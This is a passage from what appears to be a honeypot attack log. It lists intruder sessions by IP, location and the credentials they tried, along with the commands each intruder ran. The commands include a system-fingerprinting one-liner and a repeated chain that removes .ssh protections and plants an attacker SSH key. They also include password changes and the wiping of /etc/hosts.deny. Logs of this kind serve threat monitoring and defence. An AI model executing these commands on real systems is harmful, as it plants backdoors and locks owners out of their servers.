2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—13
$ uname -s -v -n -m 2 > /dev/null ร—21
$ /bin/uname -s -v -n -m 2 > /dev/null ร—13
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—13
$ busybox uname -s -v -n -m 2 > /dev/null ร—13
$ ( [ -f /proc/version ] ร—13
$ [ -f /proc/version ] ร—13
$ head -1 /proc/version | cut -d -f1 ร—13
$ [ -f /etc/os-release ] ร—13
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—8
$ uname -m 2 > /dev/null ร—8
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—8
๐ŸŽญ savage_durian_root (206.189.89.22) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-07-03 15:26 EDT ยท as root/admin123
cat
$ cat /etc/hostname
๐ŸŽญ sneaky_cowboy_root_181 (47.254.85.181) โ€” Minkler, United States ยท 1 session ยท 2 cmds
2026-07-03 14:32 EDT ยท as oracle/1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ midnight_cactus_root (189.194.140.170) โ€” Puebla City, Mexico ยท 1 session ยท 2 cmds
2026-07-03 14:30 EDT ยท as oracle/1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ manic_nomad_root_19 (209.99.191.19) โ€” Zurich, Switzerland ยท 1 session ยท 2 cmds
2026-07-03 14:29 EDT ยท as oracle/1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_seoul_root (218.51.148.194) โ€” Mapo-gu, South Korea ยท 1 session ยท 2 cmds
2026-07-03 14:28 EDT ยท as oracle/1
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ savage_wok_root_3 (14.103.115.3) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-07-03 13:07 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ weary_carpath_root (185.100.84.174) โ€” Bucharest, Romania ยท 1 session ยท 1 cmd
2026-07-03 12:21 EDT ยท as postgres/postgres
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ spectral_clog_root (80.94.92.179) โ€” Amsterdam, The Netherlands ยท 8 sessions ยท 72 cmds
2026-07-03 10:24 EDT ยท as admin/123456, admin/admin123, root/1234
export PATH modification โ†’ OS fingerprinting via multiple /usr/bin/uname and busybox variants โ†’ kernel version extraction from /proc/version โ†’ OS release detection via /etc/os-release
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—8
$ uname -s -v -n -m 2 > /dev/null ร—8
$ /bin/uname -s -v -n -m 2 > /dev/null ร—8
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—8
$ busybox uname -s -v -n -m 2 > /dev/null ร—8
$ ( [ -f /proc/version ] ร—8
$ [ -f /proc/version ] ร—8
$ head -1 /proc/version | cut -d -f1 ร—8
$ [ -f /etc/os-release ] ร—8
๐ŸŽญ velvet_clog_root (2.57.122.168) โ€” Amsterdam, The Netherlands ยท 13 sessions ยท 117 cmds
2026-07-03 10:36 EDT ยท as admin/123456, admin/admin, admin/admin123
PATH manipulation โ†’ kernel/version enumeration via uname โ†’ OS release detection through /proc/version and /etc/os-release โ†’ system profiling for compatibility.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { lscpu 2>/dev/null | awk -F: '/Model name/ {print $2}'; grep -m1 -E "^model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; grep -m1 -E "^Hardware" /proc/cpuinfo 2>/dev/null | cut -d: -f2-; cat /proc/device-tree/model 2>/dev/null; } | sed '/^$/d; /unknown/d; s/^[[:space:]]*//; s/[[:space:]]*$//; s/ AArch64 Processor$//; s/ Processor$//; s/ CPU$//' | head -1 ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—13
$ uname -s -v -n -m 2 > /dev/null ร—13
$ /bin/uname -s -v -n -m 2 > /dev/null ร—13
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—13
$ busybox uname -s -v -n -m 2 > /dev/null ร—13
$ ( [ -f /proc/version ] ร—13
$ [ -f /proc/version ] ร—13
$ head -1 /proc/version | cut -d -f1 ร—13
$ [ -f /etc/os-release ] ร—13
๐ŸŽญ nocturnal_toucan_root (187.62.87.27) โ€” Mairiporรฃ, Brazil ยท 1 session ยท 20 cmds
2026-07-03 11:15 EDT ยท as admin/admin
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "admin\nE81N9WpQioro\nE81N9WpQioro"|passwd|bash
$ Enter new UNIX password:
$ echo "admin\nE81N9WpQioro\nE81N9WpQioro\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ sneaky_tulip_root (91.92.42.195) โ€” Amsterdam, The Netherlands ยท 31 sessions ยท 31 cmds
2026-07-03 09:36 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ cryptic_stein_root (91.107.156.27) โ€” Frankfurt Am Main, Germany ยท 1 session ยท 2 cmds
2026-07-03 10:38 EDT ยท as oracle/!QAZ2wsx
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ molten_phantom_root (91.92.40.47) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-07-03 08:41 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ obsidian_void_sol (91.92.40.29) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-07-03 08:03 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ venomous_acai_root_20 (201.222.20.20) โ€” Camaรงari, Brazil ยท 2 sessions ยท 21 cmds
2026-07-03 09:21 EDT ยท as oracle/123qwe!@#, root/qwerty
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:bOwLCWDkIXB4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ grumpy_sensei_root (45.43.60.220) โ€” Tokyo, Japan ยท 2 sessions ยท 21 cmds
2026-07-03 09:21 EDT ยท as oracle/123qwe!@#, root/qwerty
root/qwerty login โ†’ chattr -ia .ssh to disable immutable flag โ†’ rm -rf .ssh to clear existing keys โ†’ mkdir .ssh to recreate directory โ†’ inject new SSH-RSA public key via echo โ†’ chpasswd to set root:KkFvCzGixeV9 โ†’ pkill -9 to terminate existing secure.sh and auth.sh processes โ†’ clear /etc/hosts
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:KkFvCzGixeV9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ midnight_star_root (185.150.190.165) โ€” Piscataway, United States ยท 1 session ยท 20 cmds
2026-07-03 09:19 EDT ยท as docker/docker123
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa..." โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "docker123\n15o9wqJxmMto..."|passwd|bash โ†’ Enter new UNIX password: โ†’ echo
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "docker123\n15o9wqJxmMto\n15o9wqJxmMto"|passwd|bash
$ Enter new UNIX password:
$ echo "docker123\n15o9wqJxmMto\n15o9wqJxmMto\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ sullen_clog_root (45.153.34.167) โ€” Eygelshoven, The Netherlands ยท 62 sessions ยท 62 cmds
2026-07-01 16:13 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—62
๐ŸŽญ listless_husk_root_235 (102.23.122.235) โ€” Lusaka, Zambia ยท 1 session ยท 20 cmds
2026-07-03 06:27 EDT ยท as ubuntu/ubuntu
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "ubuntu\nATR6fyrS0b0v\nATR6fyrS0b0v"|passwd|bash
$ Enter new UNIX password:
$ echo "ubuntu\nATR6fyrS0b0v\nATR6fyrS0b0v\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ molten_junk_root (47.82.102.235) โ€” Hong Kong, Hong Kong ยท 12 sessions ยท 12 cmds
2026-06-19 12:12 EDT ยท as admin/admin, admin/password, deploy/deploy123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—12
๐ŸŽญ brazen_stroopwafel_root (45.153.34.114) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-07-03 05:02 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 4x across 4 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ obsidian_baguette_root (158.220.111.161) โ€” Lauterbourg, France ยท 3 sessions ยท 6 cmds
2026-06-17 22:51 EDT ยท as root/123456, root/password, root/toor
hostname discovery โ†’ free
$ hostname ร—3
โ†ณ hostname discovery
$ free -m | awk '/^Mem:/ {print $2}' ร—3
๐ŸŽญ baroque_mariachi_root (187.174.238.116) โ€” รlvaro Obregรณn, Mexico ยท 1 session ยท 2 cmds
2026-07-03 00:08 EDT ยท as oracle/1qa2ws3ed
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
